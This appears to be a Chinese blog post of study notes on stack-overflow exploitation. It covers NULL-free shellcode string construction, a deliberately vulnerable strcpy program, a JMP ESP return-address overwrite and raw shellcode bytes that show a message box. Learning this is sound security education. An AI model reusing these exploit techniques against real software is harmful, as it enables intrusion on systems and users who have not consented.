栈溢出shellcode字符串push

最新推荐文章于 2025-05-09 11:39:13 发布
最新推荐文章于 2025-05-09 11:39:13 发布
阅读量1.4k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞基础学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/9668907
本文介绍了一种特殊的字符串注入技巧,通过使用不同的汇编指令来绕过NULL字节限制,实现复杂字符串的有效注入。包括字符串的拆分、组合及特殊字符处理等方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这是很久以前的笔记了  去年的笔记···········

这里增加几条:

1)  PUSH  字符串, 先用其他字符代表0x00  然后 通过 EBP的负偏离量处一字节一字节的写入!!!!!!!!!!

重新产生没有 NULL字节的 机器码

2) XOR/add /sub  计算  比如 0x006e616c  那么     0x77191693 xor 0x777777ff = 0x006e616c    直接压入 进行xor

mov eax,0x77191693 

mov ebx,0x777777ff

xor eax,ebx

push eax 

3)直接压入字符串 然后单字节压入 

xor eax,eax, 

push eax,           

mov ebp,esp

mov byte [ebp-2] ,61

4) 对于  像  0x000000AB   的字符的话    用  

mov eax,0xXXXXX   

push eax

5)直接用  0x20 空格代替 结束符,一般情况下可以用的



00401110      33C0          xor eax,eax
00401112      8BEC          mov ebp,esp
00401114      68 61202020   push 0x20202061
00401119      8845 FD       mov byte ptr ss:[ebp-0x3],al
0040111C      68 70616E64   push 0x646E6170
00401121      8BDC          mov ebx,esp
00401123      50            push eax
00401124      68 B3F6C1CB   push 0xCBC1F6B3
00401129      68 BEADD2E7   push 0xE7D2ADBE
0040112E      68 6120D2D1   push 0xD1D22061
00401133      68 70616E64   push 0x646E6170
00401138      68 B1A8B8E6   push 0xE6B8A8B1
0040113D      8BCC          mov ecx,esp
0040113F      50            push eax
00401140      53            push ebx
00401141      51            push ecx
00401142      50            push eax
00401143      E8 A2F69477   call USER32.MessageBoxA

可以看到我们已经可以构造  不是标准 4字节的字符串了,而且可以再也不用烦恼 bad character!!!!!!!!!




以下分析有错   在JMP EBX  中  运行shellcode运行时会修改shellcode 所以最好都不知道变什么样了  但是PUSH 字符串分析是正确的

因为压栈会破坏数据


想要插入字符串  必须从后往前插入 如果大于4字节  并且保证最后为4字节再例如:

0013FAF0    33DB                               xor ebx,ebx
0013FAF2    53                                 push ebx
0013FAF3    6A 61                              push 0x61
0013FAF5    68 50616E64                        push 0x646E6150
0013FAFA    68 20627920                        push 0x20796220
0013FAFF    68 30646179                        push 0x79616430
0013FB04    8BC4                               mov eax,esp

原因是 push 后有结束符吧
以上是最难得地方;


这里是源码:

#include <stdio.h>
#include <windows.h>
#define PASSWORD "1234567"
int verify_password (char *password)
{
	int authenticated;
	char buffer[44];
	authenticated=strcmp(password,PASSWORD);
	strcpy(buffer,password);//over flowed here!	
	return authenticated;
}
main()
{
	int valid_flag=0;
	char password[1024];
	FILE * fp;
	LoadLibrary("user32.dll");//prepare for messagebox
	if(!(fp=fopen("password.txt","rw+")))
	{
		exit(0);
	}
	fscanf(fp,"%s",password);
	valid_flag = verify_password(password);
	if(valid_flag)
	{
		printf("incorrect password!\n");
	}
	else
	{
		printf("Congratulation! You have passed the verification!\n");
	}
	fclose(fp);
}

写了个程序  可以倒叙输出字符串  方便压栈





以下为正确的:

JMP ESP   堆栈很安全  几乎没被修改:

77D91E64  - FFE4            jmp esp
在返回地址处 修改为上面这个 

0013FB28    33DB            xor ebx,ebx
0013FB2A    53              push ebx
0013FB2B    6A 61           push 0x61
0013FB2D    68 50616E64     push 0x646E6150
0013FB32    8BC4            mov eax,esp
0013FB34    53              push ebx
0013FB35    50              push eax
0013FB36    50              push eax
0013FB37    53              push ebx
0013FB38    B8 EA07D577     mov eax,user32.MessageBoxA
0013FB3D    FFD0            call eax
0013FB3F    B8 FACA817C     mov eax,kernel32.ExitProcess
0013FB44    FFD0            call eax

二进制位:

33 DB 53 6A 61 68 50 61 6E 64 8B C4 53 50 50 53 B8 EA 07 D5 77 FF D0 B8 FA CA 81 7C FF D0

安全弹框  安全退出













栈溢出攻击示例(shellcode打印/etc/passwd内容)
danxinzhujian的博客
12-02 482
参考:https://blog.csdn.net/omnispace/article/details/51005934 在实验之前,首先需要关闭操作系统的ASLR,否则每次内存地址都会发生变化。关闭ubuntu操作系统的ASLR需要以root权限执行命令(文件内容默认为2,且操作系统重启后自动恢复): echo 0 > /proc/sys/kernel/randomize_va_space 漏洞代码入下: #include <stdio.h> #include <stdl
【逆向】栈溢出漏洞学习过程(一)通过字符串验证的简单程序分析
lanlanla的成长历程
01-08 3561
目录 前言: 1 准备程序 PS:翻车现场: 2 分析程序执行流程(栈溢出原理) 2.1 看代码中忘记的知识补充一下: 2.1.1 主函数中涉及的寄存器相关知识: 2.1.2 涉及到的指令 地址传送指令LEA PTR REP STOS int 3中断 段超越指令前缀 2.2 main函数中的初始化部分 2.3 scanf()函数部分 2.4 函数verify_pas...
shellcode转换字符串
07-18
shellcode转换字符串
栈溢出——ret2shellcode(二)
最新发布
weixin_68408599的博客
05-09 989
ret2shellcode攻击具有主动性,此时程序中通常没有可以利用的后门,而程序中的某些地址具有可执行权限,那么若我们将返回地址改到这些具有可执行权限的地点并且能向该处写入shellcode那么就能执行我们想要的shellcode功能。接下来,就是寻找相关地址了,这有个注意点,就是shellcode所在的段是否有可执行的权限,若开启了NX防护,相关栈堆无法就行,就没办法执行了。可以看到,这的保护全关闭,且存在一个RWX的segments,RWX权限就是可读(R),可写(W),可执行(X)。
shellcode之一:栈溢出
AZURE
01-22 5206
前言:现在我是嵌入式软件开发者,大学本科读的是电子信息专业,正常的来说不会与入侵、漏洞利用什么的打交道。只是大一时心血来潮用工具进入了另外一台电脑。其实这些也无关重要,重要的是我从那台电脑上down了第一部A片。不出意外的话,那台电脑应该属于女生的,因为那个IP段是女生楼那边的。后来我就可以很笃定的跟别人说:女生也是要看A片的。后来又用工具入侵了更多的局域网电脑,甚至学校一些社团的服务器。再后来,
栈溢出攻击和shellcode
LittleEmperor
09-16 6430
README 本文默认读者熟悉C语言编程和x86汇编语法,熟悉函数调用过程和调用规约,简单了解linux系统,包括进程内存布局,系统调用和内核内存管理机制,对栈溢出攻击有基本认知。 文章会做一个栈溢出攻击的DEMO,来展示一个典型的shellcode是如何打造,如何工作的。 文章将抛开宏观层面的解释,尽量细致地阐述shellcode的构建过程和异常问题分析等诸多细节,帮助读者把栈溢出攻击和s...
栈溢出 shellcode ret2shellcode
wing_7的博客
10-06 618
shellcode_address = buf_address+0x20 # buf与rbp的距离0x10 + rbp的宽度0x8 + 返回地址的长度0x8。rbp用来存储当前函数状态的基地址,在函数运行时不变,用来索引确定函数的参数或局部变量的位置。将函数的返回地址覆写为我们构造的shell的地址,这样就可以达到获取shell的目的了。将函数的返回地址覆写为我们构造的shell的地址,这样就可以达到获取shell的目的了。栈空间增长方式是从高地址到地址的,也就是栈顶的地址值是小于栈底的地址值的。
初识栈溢出及利用栈溢出的四种攻击方法
Kni9hT's Blog
07-22 6108
栈溢出 本质: 混淆了用户输入与栈上的元数据 产生原因: 用户输入的数据大小超过了程序预留的空间大小 利用: 覆盖返回地址 覆盖栈上的变量,例如函数指针或对象指针 基本栈溢出漏洞实例:实际演示 stack_shellcode 以python语言举例, 运行报错。 据我理解,在python中,函数调用一次,栈(stack)多加一层栈帧,由于栈帧的增加有上限,函数调用次数过多会导致栈溢出。(在c语...
PWN基础知识及基础栈溢出手法
山高路远
04-12 4305
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
二进制菜鸟之栈溢出漏洞利用思路
Blood_Pupil的博客
08-06 1073
作为一只二进制菜鸟,不,应该是作为一只各安全领域的菜鸟,感觉二进制学的还是蛮开心的,每天也都能学到点新的东西,调试代码的过程也是非常令人开心。今天总结下目前学到的栈溢出漏洞的利用思路 栈溢出漏洞简介 我们知道C语言中有些字符串操作函数不会对字符串的长度进行检查,比如strcpy。 #include<stdio.h> #include<string.h> char nam...
栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(六)固定地址的栈溢出攻击
沧海一粟
02-23 2983
栈溢出攻击系列:shellcode在linux x86 64位攻击获得root权限(六)固定地址的栈溢出攻击
shellcode中在代码段中使用字符串
dasgk的专栏
09-12 1497
// CrackMe.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include #include #include using namespace std; int main() {     goto shellEnd;     _asm     { shellCode:         pushad;
漏洞练习之网络编程与堆栈溢出技术
蚁景网安学院
07-20 560
0x00公众号之前发过Exploit-Exercise之Nebula实践指南,Exploit-Exercise一共有5个镜像可供练习,如下所示本系列文章将会介绍第二个镜像Protosta...
C 栈溢出详解
热门推荐
lanximu的专栏
01-14 1万+
转载:作者:独自等待出处:IT专家网2007-12-18 09:56 虽然溢出在程序开发过程中不可完全避免,但溢出对系统的威胁是巨大的,由于系统的特殊性,溢出发生时攻击者可以利用其漏洞来获取系统的高级权限root,因此本文将详细介绍堆栈溢出技术……   在您开始了解堆栈溢出前,首先你应该了解win32汇编语言,熟悉寄存器的组成和功能。你必须有堆栈和存储分配方面的基础知识,有关这方面的计算机书籍
shellcode编写探究
hongduilanjun的博客
07-21 1174
shellcode是不依赖环境,放到任何地方都可以执行的机器码。shellcode的应用场景很多,本文不研究shellcode的具体应用,而只是研究编写一个shellcode需要掌握哪些知识。
栈溢出原理与实现
挖树
10-23 1093
栈结构: 1.方向:高地址(栈底)->低地址(栈顶) 2.加载完成pe后,系统会为这个pe分配一个栈,这个栈用于 实现(类似C)高级语言中函数的调用。 3.(2)所说的分配的栈是系统自动维护,并且push pop等平衡细节都是透明的。一般来说只有在使用汇编代码的时候,心会和它直接打交道。 函数调用与栈 #include<stdio.h> void fuc_B() { pr...
栈溢出利用手段总结
weixin_59166557的博客
09-16 1728
ret2csu(Return to __libc_csu_init)是一种利用方法,主要用于在没有足够控制权的情况下调用任意函数,尤其是在栈保护(Stack Canary)、无执行(NX)和地址随机化(ASLR)等保护机制启用时,无法直接通过传统的ret2libc等方式进行利用。是Glibc库中的一个函数,它在程序启动时被执行。这个函数有两个部分:一个是初始化部分,另一个是调用构造函数部分。我们主要关注的是初始化部分,因为它提供了一种控制寄存器的方法。
shellcode编写
摸爬滚打
04-20 1156
一般用5个步骤实现 先用高级语言编写shellcode程序 编译并反汇编这个shellcode程序 从汇编级分析程序执行流程 整理生成的汇编代码 尽量减小他的体积使他可注入 提取opcode,创建shellcode shellcode地址问题       在shellcode使用相对地址需要一些技巧。可以把shellcode在内存中的开始地址或 shellcode的重要元
pwn入门:基本栈溢出
03-22
### PWN入门教程:基本栈溢出原理与实例分析 #### 栈溢出的基本概念 栈溢出是一种常见的内存安全漏洞,通常发生在程序试图向栈中写入的数据量超过了分配给该变量的空间时。这种行为可能导致覆盖相邻的内存区域,从而改变程序的行为甚至执行恶意代码[^1]。 #### C语言中的函数调用栈 在C语言中,每当一个函数被调用时,都会创建一个新的栈帧(stack frame),用于存储局部变量、返回地址和其他必要的信息。当发生栈溢出时,攻击者可以利用这一特性修改返回地址,使程序跳转至攻击者指定的位置并执行预定义的指令序列[^2]。 #### 栈的工作机制 栈作为一种后进先出的数据结构,在计算机科学中有广泛的应用场景。对于栈溢出的理解而言,掌握其核心操作——压栈(push)和弹栈(pop)尤为重要。这些操作均作用于栈顶位置,而栈本身还存在固定的栈底边界[^3]。 以下是简单的栈溢出示例代码及其对应的汇编逻辑: ```c #include <stdio.h> #include <string.h> void vulnerable_function(char *str) { char buffer[8]; strcpy(buffer, str); // 存在缓冲区溢出风险 } int main(int argc, char **argv) { if (argc > 1) vulnerable_function(argv[1]); return 0; } ``` 上述代码片段展示了如何因不当使用 `strcpy` 函数而导致潜在的安全隐患。如果输入字符串长度超过数组 `buffer` 的大小,则会发生越界写入现象,进而可能破坏堆栈上的其他重要数据项,比如保存的返回指针值。 为了验证此过程的具体表现形式,可以通过调试工具逐步跟踪每一步骤下的寄存器状态变化情况以及相应内存布局调整状况;同时观察到一旦超出预定界限范围之后便会对后续部分造成不可控的影响效果。 --- #### 实际案例解析 假设目标二进制文件未启用任何防护措施(如NX bit 或 ASLR)。那么基于前面提到过的理论依据,我们可以尝试构造特定格式的有效载荷注入shellcode实现远程命令交互功能。 具体步骤如下: 1. 寻找合适的偏移点以定位覆盖原有ret addr; 2. 替换为目标机器码地址指向自定义脚本启动入口处; 3. 成功触发后即获得对应权限等级下运行环境控制权。 需要注意的是现代操作系统普遍引入多种防御手段来对抗此类威胁因此实际应用过程中还需考虑更多因素才能达成最终目的。 --- ### 结论 通过对以上内容的学习能够初步认识什么是pwn挑战赛项目的常见考点之一—Stack Buffer Overflow,并学会识别相关危险信号以便采取适当预防策略减少遭受网络攻击的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值